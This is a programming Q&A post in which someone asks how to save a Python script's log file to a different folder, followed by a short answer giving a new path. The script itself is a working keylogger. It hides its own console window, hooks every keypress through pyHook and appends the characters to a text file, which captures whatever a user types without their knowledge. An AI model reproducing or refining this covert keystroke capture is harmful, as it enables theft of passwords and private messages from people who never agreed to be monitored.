# Redirecting a file to another location

Tags: python

Can I Redirect the log_file.txt to another location such as C\Folder\log_file.txt?

This is the program I am trying to make "log_file.txt" save in a location other than the desktop.

```
#!/usr/bin/python
    import pyHook
    import pythoncom
    import win32gui
    import win32console


    log_file = "log_file.txt"                 #name of log file
    window = win32console.GetConsoleWindow()  #go to script window
    win32gui.ShowWindow(window,0)             #hide window

    def pressed_chars(event):       #on key pressed function
        if event.Ascii:
            f = open(log_file,"a")  # (open log_file in append mode)
            char = chr(event.Ascii) # (insert real char in variable)
            if char == "q":         # (if char is q)
                f.close()           # (close and save log file)
                exit()              # (exit program)
            if event.Ascii == 13:   # (if char is "return")
                f.write("\n")       # (new line)
            f.write(char)           # (write char)



    proc = pyHook.HookManager()      #open pyHook
    proc.KeyDown = pressed_chars     #set pressed_chars function on KeyDown event
    proc.HookKeyboard()              #start the function
    pythoncom.PumpMessages()         #get input
```

Answer (score 0):

Yes, you can change the file location as below:

```
log_file = 'C:\Folder\log_file.txt'
```

If the file is not present in the specified location, a new file will be created with the name that you provide. In this case the new file will be named as `log_file.txt`